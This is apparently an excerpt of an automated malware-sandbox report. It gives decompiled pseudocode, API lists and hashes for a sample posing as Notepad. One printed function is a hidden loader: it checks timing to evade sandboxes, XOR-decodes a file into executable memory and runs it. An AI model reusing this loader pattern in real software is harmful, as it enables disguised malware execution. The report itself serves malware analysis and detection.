					if(_t4 != 0) {
						break;
					}
					__eflags = E004051C4();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004087B5(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                    0x00407d4e
                    0x00407d54
                    0x00407d86
                    0x00407d8b
                    0x00407d91
                    0x00000000
                    0x00407d91
                    0x00407d58
                    0x00407d5a
                    0x00407d5a
                    0x00407d71
                    0x00407d7a
                    0x00407d82
                    0x00000000
                    0x00000000
                    0x00407d62
                    0x00407d64
                    0x00000000
                    0x00000000
                    0x00407d67
                    0x00407d6d
                    0x00407d6f
                    0x00000000
                    0x00000000
                    0x00407d6f
                    0x00000000

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                    • Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
                    • Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                    • Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0151D5B0 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d21f60265ee812c2f5d48addb479a3b4a5a2c483b711a2960e18f191fe5217e
                    • Instruction ID: 1263492b8db09c10e8d763ec9ef7a016939faa06df262c4c96335c3bed3a5aae
                    • Opcode Fuzzy Hash: 0d21f60265ee812c2f5d48addb479a3b4a5a2c483b711a2960e18f191fe5217e
                    • Instruction Fuzzy Hash: D921D675504244DFEB16DF58D9C4B2ABFB5FB88314F248969E9090F20AC33AD855CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0152D1D4 Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4239327002d159527ea8b0c7c08f0e6c710dc903e35fcae3a291790c69d4b03b
                    • Instruction ID: 37d39d0353ca0e1869579c4784396d09f20b319cf3db207fcf7e47f625a147d3
                    • Opcode Fuzzy Hash: 4239327002d159527ea8b0c7c08f0e6c710dc903e35fcae3a291790c69d4b03b
                    • Instruction Fuzzy Hash: 85210A76504240DFDB05CF98D5C0B15BBB5FB86324F20C96DE9494F282C33AD806CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0152D01C Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 70740b9bf10be8b5af5fe852880812577bc58c6e16ae37b199e9738621cf7621
                    • Instruction ID: f9fcdf123ba92d4b50a2f654e5349c9294a4e2709e52a9ad2e8e23faef6ce81e
                    • Opcode Fuzzy Hash: 70740b9bf10be8b5af5fe852880812577bc58c6e16ae37b199e9738621cf7621
                    • Instruction Fuzzy Hash: C0210376504240DFDB15CF58D4C0B2ABBB5FB85354F20C96DE9490F296D33ED806CA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0152D006 Relevance: .1, Instructions: 62COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02df92deb88aa4e401b1e36c0cb212451a73363a88003ad91d2cdfdb291b86a7
                    • Instruction ID: c52bb1e09371545ee2e6b4822b62dd77aefc1b7f287d8b93fe0e1bc2fa1b842c
                    • Opcode Fuzzy Hash: 02df92deb88aa4e401b1e36c0cb212451a73363a88003ad91d2cdfdb291b86a7
                    • Instruction Fuzzy Hash: 4D2183765083808FD713CF24D590715BF71FB46214F28C5DAD8498F6A7C33A980ACB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0151D5AB Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 982c360c003d4f1ee582f2a962539945f00b5747649ba5e4ae048a2b1d742921
                    • Instruction ID: f8e6969b260087d4931c0b283e99e6ab188b7f0350facbbb5513eaf5387a357b
                    • Opcode Fuzzy Hash: 982c360c003d4f1ee582f2a962539945f00b5747649ba5e4ae048a2b1d742921
                    • Instruction Fuzzy Hash: 8711AF76504280DFDB12CF54D9C4B1ABF72FB84324F24C6A9D8494B61BC33AD456CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0152D1CF Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6517b0c51532ab1228694df95b8b3b3c13daef207f256e768b7618657812813
                    • Instruction ID: 9c053b692719b38f86349e8f1fdfe27e75c4234306f709ad6b1cb147acf55a9e
                    • Opcode Fuzzy Hash: a6517b0c51532ab1228694df95b8b3b3c13daef207f256e768b7618657812813
                    • Instruction Fuzzy Hash: 32118B76904280DFDB12CF54D5C4B19BBB2FB86324F24C6AED8494F696C33AD44ACB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0151D01D Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6bd495fa7026156ed20a0bf62f668f449cf081f02a3f0ec65e7d89a345351400
                    • Instruction ID: eb4f46d2af22872582649787bb8bbeeb936370eb9e766edbad9b96faf7282788
                    • Opcode Fuzzy Hash: 6bd495fa7026156ed20a0bf62f668f449cf081f02a3f0ec65e7d89a345351400
                    • Instruction Fuzzy Hash: 6401FC714043409AF7124A6ACCC8766BFE8FF413A4F14C45AED441F246D3799445CAB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0151D006 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f352da9157bce432ed4f3e7e5da2eddca07bcff99dcc2c211819bcfb3f25a32e
                    • Instruction ID: c7c2623fbfbca7ca31c360fedc0f8a4b9c4066e4382c4247b2a38ea0a5a476a3
                    • Opcode Fuzzy Hash: f352da9157bce432ed4f3e7e5da2eddca07bcff99dcc2c211819bcfb3f25a32e
                    • Instruction Fuzzy Hash: B701807140D3C05FE7138B258C94B56BFB8EF43224F1981CBD9848F297D2688808CB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 002828A0 Relevance: 73.8, APIs: 33, Strings: 9, Instructions: 251windowlibraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E002828A0(signed long long __fp0, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
				struct _WNDCLASSEXW _v56;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				struct tagMONITORINFO _v104;
				struct tagMSG _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				void* _t48;
				struct HINSTANCE__* _t55;
				int _t57;
				struct HMONITOR__* _t62;
				intOrPtr _t64;
				struct HWND__* _t66;
				int _t76;
				int _t79;
				int _t80;
				int _t81;
				void* _t88;
				void* _t90;
				void* _t99;
				intOrPtr* _t100;
				void* _t105;
				intOrPtr _t108;
				signed int _t114;
				int _t117;
				void* _t128;
				intOrPtr* _t130;
				int _t131;
				intOrPtr* _t135;
				void* _t136;
				int _t140;
				struct HACCEL__* _t141;
				void* _t144;
				signed int _t145;
				void* _t147;
				signed long long _t156;

				_t156 = __fp0;
				_t147 = (_t145 & 0xfffffff8) - 0x7c;
				_t100 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetTickCount");
				_v132.wParam = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "Sleep");
				_t130 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "VirtualAlloc");
				_t46 =  *_t100(_t128, _t136, _t99);
				_t138 = _t46;
				_v132.wParam(0x2be);
				_t48 =  *_t100();
				_t151 = _t48 - _t46 - 0x2bc;
				if(_t48 - _t46 >= 0x2bc) {
					_t88 = E00282D3E(_a12, L"rb");
					_t105 = _t88;
					E0028335F(_t105, _t130, _t138, _t151);
					_t90 = E00283270(_t105, _t130, _t138, _t151);
					_t144 = _t90;
					E0028335F(_t105, _t130, _t144, _t151);
					_t135 =  *_t130(0, _t144, 0x3000, 0x40, _t105, 0, 0, _t105, _t105, 0, 2);
					E002830BF(_t135, _t144, 1, _t105);
					_t147 = _t147 + 0x34;
					_t114 = 0;
					if(_t144 != 0) {
						do {
							_t10 = _t114 - (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + "248058040134"; // 0x30383432
							_t115 =  *_t10;
							 *(_t114 + _t135) =  *(_t114 + _t135) ^  *_t10;
							_t114 = _t114 + 1;
						} while (_t114 < _t144);
					}
					 *_t135();
				}
				 *0x295f64 = RegisterWindowMessageW(L"commdlg_FindReplace");
				E00285760(0x2970e0, 0, 0x11f4);
				 *0x2970e0 = _a4;
				E00281640(_t115, _t156);
				E00285760( &_v56, 0, 0x30);
				_t55 =  *0x2970e0;
				_v56.cbSize = 0x30;
				_v56.lpfnWndProc = E00282340;
				_v56.hInstance = _t55;
				_v56.hIcon = LoadIconW(_t55, 0x300);
				_t57 = GetSystemMetrics(0x32);
				_v56.hIconSm = LoadImageW( *0x2970e0, 0x300, 1, GetSystemMetrics(0x31), _t57, 0x8000);
				_v56.hCursor = LoadCursorW(0, 0x7f00);
				_v56.hbrBackground = 6;
				_v56.lpszMenuName = 0x201;
				_v56.lpszClassName = L"Notepad";
				_t62 = RegisterClassExW( &_v56);
				if(_t62 != 0) {
					__imp__MonitorFromRect(0x295f68, 1);
					_v104.cbSize = 0x28;
					GetMonitorInfoW(_t62,  &_v104);
					_t117 =  *0x295f68; // 0x0
					_t140 =  *0x295f6c; // 0x0
					_t64 =  *0x295f74; // 0x0
					_t108 =  *0x295f70; // 0x0
					_t131 = _t117;
					__eflags = _t117 - _v76;
					if(_t117 >= _v76) {
						L10:
						_t140 = 0x80000000;
						_t131 = 0x80000000;
					} else {
						__eflags = _t140 - _v72;
						if(_t140 >= _v72) {
							goto L10;
						} else {
							__eflags = _t108 - _v104.rcWork;
							if(_t108 < _v104.rcWork) {
								goto L10;
							} else {
								__eflags = _t64 - _v80;
								if(_t64 < _v80) {
									goto L10;
								}
							}
						}
					}
					_t66 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t131, _t140, _t108 - _t117, _t64 -  *0x295f6c, 0, 0,  *0x2970e0, 0);
					 *0x2970e4 = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						 *0x280000();
						ExitProcess(1);
					}
					E00281E60();
					 *0x280000();
					ShowWindow( *0x2970e4, _a16);
					UpdateWindow( *0x2970e4);
					DragAcceptFiles( *0x2970e4, 1);
					E00282690(GetCommandLineW());
					_t141 = LoadAcceleratorsW(_a4, 0x203);
					_t76 = GetMessageW( &_v132, 0, 0, 0);
					__eflags = _t76;
					if(_t76 != 0) {
						do {
							_t79 = IsDialogMessageW( *0x2970e8,  &_v132);
							__eflags = _t79;
							if(_t79 == 0) {
								_t81 = TranslateAcceleratorW( *0x2970e4, _t141,  &_v132);
								__eflags = _t81;
								if(_t81 == 0) {
									TranslateMessage( &_v132);
									DispatchMessageW( &_v132);
								}
							}
							_t80 = GetMessageW( &_v132, 0, 0, 0);
							__eflags = _t80;
						} while (_t80 != 0);
					}
					return _v132.wParam;
				} else {
					return 0;
				}
			}











































                    0x002828a0
                    0x002828a6
                    0x002828d1
                    0x002828e2
                    0x002828eb
                    0x002828ed
                    0x002828f4
                    0x002828f6
                    0x002828fa
                    0x002828fe
                    0x00282903
                    0x0028290e
                    0x00282915
                    0x0028291a
                    0x00282920
                    0x0028292a
                    0x0028292c
                    0x00282943
                    0x00282947
                    0x0028294c
                    0x0028294f
                    0x00282953
                    0x00282955
                    0x0028296a
                    0x0028296a
                    0x00282970
                    0x00282973
                    0x00282974
                    0x00282955
                    0x00282978
                    0x00282978
                    0x00282991
                    0x00282997
                    0x002829a2
                    0x002829a7
                    0x002829b5
                    0x002829ba
                    0x002829c8
                    0x002829d0
                    0x002829d8
                    0x002829ef
                    0x002829f3
                    0x00282a16
                    0x00282a23
                    0x00282a2c
                    0x00282a34
                    0x00282a3f
                    0x00282a4a
                    0x00282a53
                    0x00282a67
                    0x00282a73
                    0x00282a7b
                    0x00282a81
                    0x00282a87
                    0x00282a8d
                    0x00282a92
                    0x00282a98
                    0x00282a9a
                    0x00282a9e
                    0x00282ab2
                    0x00282ab2
                    0x00282ab7
                    0x00282aa0
                    0x00282aa0
                    0x00282aa4
                    0x00000000
                    0x00282aa6
                    0x00282aa6
                    0x00282aaa
                    0x00000000
                    0x00282aac
                    0x00282aac
                    0x00282ab0
                    0x00000000
                    0x00000000
                    0x00282ab0
                    0x00282aaa
                    0x00282aa4
                    0x00282ae3
                    0x00282ae9
                    0x00282aee
                    0x00282af0
                    0x00282af2
                    0x00282afa
                    0x00282afa
                    0x00282b00
                    0x00282b05
                    0x00282b15
                    0x00282b22
                    0x00282b31
                    0x00282b3d
                    0x00282b62
                    0x00282b64
                    0x00282b66
                    0x00282b68
                    0x00282b70
                    0x00282b7b
                    0x00282b81
                    0x00282b83
                    0x00282b92
                    0x00282b94
                    0x00282b96
                    0x00282b9d
                    0x00282ba8
                    0x00282ba8
                    0x00282b96
                    0x00282bb9
                    0x00282bbb
                    0x00282bbb
                    0x00282b70
                    0x00282bc9
                    0x00282a55
                    0x00282a5d
                    0x00282a5d

                    APIs
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 002828BC
                    • GetProcAddress.KERNEL32(00000000), ref: 002828C5
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 002828D3
                    • GetProcAddress.KERNEL32(00000000), ref: 002828D6
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 002828E6
                    • GetProcAddress.KERNEL32(00000000), ref: 002828E9
                    • _fseek.LIBCMT ref: 0028291A
                    • _fseek.LIBCMT ref: 0028292C
                      • Part of subcall function 0028335F: __lock_file.LIBCMT ref: 002833A0
                      • Part of subcall function 0028335F: __fseek_nolock.LIBCMT ref: 002833B1
                    • __fread_nolock.LIBCMT ref: 00282947
                    • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 0028297F
                    • _memset.LIBCMT ref: 00282997
                    • _memset.LIBCMT ref: 002829B5
                    • LoadIconW.USER32 ref: 002829DC
                    • GetSystemMetrics.USER32 ref: 002829F3
                    • GetSystemMetrics.USER32 ref: 002829F8
                    • LoadImageW.USER32 ref: 00282A09
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00282A1D
                    • RegisterClassExW.USER32 ref: 00282A4A
                      • Part of subcall function 00282D3E: __wfsopen.LIBCMT ref: 00282D4B
                    • MonitorFromRect.USER32(00295F68,00000001), ref: 00282A67
                    • GetMonitorInfoW.USER32 ref: 00282A7B
                    • CreateWindowExW.USER32 ref: 00282AE3
                    • ExitProcess.KERNEL32 ref: 00282AFA
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00282B15
                    • UpdateWindow.USER32(?), ref: 00282B22
                    • DragAcceptFiles.SHELL32(?,00000001), ref: 00282B31
                    • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 00282B37
                    • LoadAcceleratorsW.USER32 ref: 00282B4B
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282B64
                    • IsDialogMessageW.USER32(?,?), ref: 00282B7B
                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00282B92
                    • TranslateMessage.USER32(?), ref: 00282B9D
                    • DispatchMessageW.USER32 ref: 00282BA8
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282BB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowUpdate__fread_nolock__fseek_nolock__lock_file__wfsopen
                    • String ID: ($0$GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
                    • API String ID: 660244864-2033289487
                    • Opcode ID: c409cb4264a9b669622cd29afad8c0ed9c91d31143152f1309b75accefe11290
                    • Instruction ID: b6a841668ad9cee587483ff2fed6c380b09105e22d734fb97bb9eab9265952bc
                    • Opcode Fuzzy Hash: c409cb4264a9b669622cd29afad8c0ed9c91d31143152f1309b75accefe11290
                    • Instruction Fuzzy Hash: F081D175661305AFD710EFB1EC8EF5B3BE8EF84B40F10451AFA45972D1DAB0A8148BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002879C4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E002879C4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x294288; // 0xbb40e64e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x295d30 = _t6;
				 *0x295d2c = _t22;
				 *0x295d28 = _t25;
				 *0x295d24 = _t21;
				 *0x295d20 = _t27;
				 *0x295d1c = _t26;
				 *0x295d48 = ss;
				 *0x295d3c = cs;
				 *0x295d18 = ds;
				 *0x295d14 = es;
				 *0x295d10 = fs;
				 *0x295d0c = gs;
				asm("pushfd");
				_pop( *0x295d40);
				 *0x295d34 =  *_t31;
				 *0x295d38 = _v0;
				 *0x295d44 =  &_a4;
				 *0x295c80 = 0x10001;
				_t11 =  *0x295d38; // 0x0
				 *0x295c34 = _t11;
				 *0x295c28 = 0xc0000409;
				 *0x295c2c = 1;
				_t12 =  *0x294288; // 0xbb40e64e
				_v812 = _t12;
				_t13 =  *0x29428c; // 0x44bf19b1
				_v808 = _t13;
				 *0x295c78 = IsDebuggerPresent();
				_push(1);
				E002879BC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("(\)");
				if( *0x295c78 == 0) {
					_push(1);
					E002879BC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879ca
                    0x002879cc
                    0x002879cc
                    0x0028ac4a
                    0x0028ac4f
                    0x0028ac55
                    0x0028ac5b
                    0x0028ac61
                    0x0028ac67
                    0x0028ac6d
                    0x0028ac74
                    0x0028ac7b
                    0x0028ac82
                    0x0028ac89
                    0x0028ac90
                    0x0028ac97
                    0x0028ac98
                    0x0028aca1
                    0x0028aca9
                    0x0028acb1
                    0x0028acbc
                    0x0028acc6
                    0x0028accb
                    0x0028acd0
                    0x0028acda
                    0x0028ace4
                    0x0028ace9
                    0x0028acef
                    0x0028acf4
                    0x0028ad00
                    0x0028ad05
                    0x0028ad07
                    0x0028ad0f
                    0x0028ad1a
                    0x0028ad27
                    0x0028ad29
                    0x0028ad2b
                    0x0028ad30
                    0x0028ad44

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0028ACFA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0028AD0F
                    • UnhandledExceptionFilter.KERNEL32((\)), ref: 0028AD1A
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0028AD36
                    • TerminateProcess.KERNEL32(00000000), ref: 0028AD3D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: (\)
                    • API String ID: 2579439406-2644722814
                    • Opcode ID: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction ID: 9620e6606564b849e26227014aa917bb265010fab49c45915e8257f0604a37a4
                    • Opcode Fuzzy Hash: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction Fuzzy Hash: EF21B574A11B28DFD746EF69FC8D6483BB4BB48314F50441BE908973B0E7B059818F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401C83 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E00401C83(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00401E78(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00402470(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00402470(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00401E78(_t49);
				}
				return _t49;
			}


































                    0x00401c83
                    0x00401c83
                    0x00401c83
                    0x00401c97
                    0x00401c99
                    0x00401c9c
                    0x00401c9c
                    0x00401ca0
                    0x00401ca5
                    0x00401cbd
                    0x00401cc3
                    0x00401cc9
                    0x00401ccf
                    0x00401cd5
                    0x00401cdb
                    0x00401ce1
                    0x00401ce8
                    0x00401cef
                    0x00401cf6
                    0x00401cfd
                    0x00401d04
                    0x00401d0b
                    0x00401d0c
                    0x00401d15
                    0x00401d1b
                    0x00401d1e
                    0x00401d24
                    0x00401d33
                    0x00401d3f
                    0x00401d4a
                    0x00401d51
                    0x00401d58
                    0x00401d63
                    0x00401d6b
                    0x00401d74
                    0x00401d76
                    0x00401d79
                    0x00401d7b
                    0x00401d85
                    0x00401d8d
                    0x00401d93
                    0x00000000
                    0x00401d9a
                    0x00401d9d

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                    • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                    • Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
                    • Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                    • Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040207B Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E0040207B(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
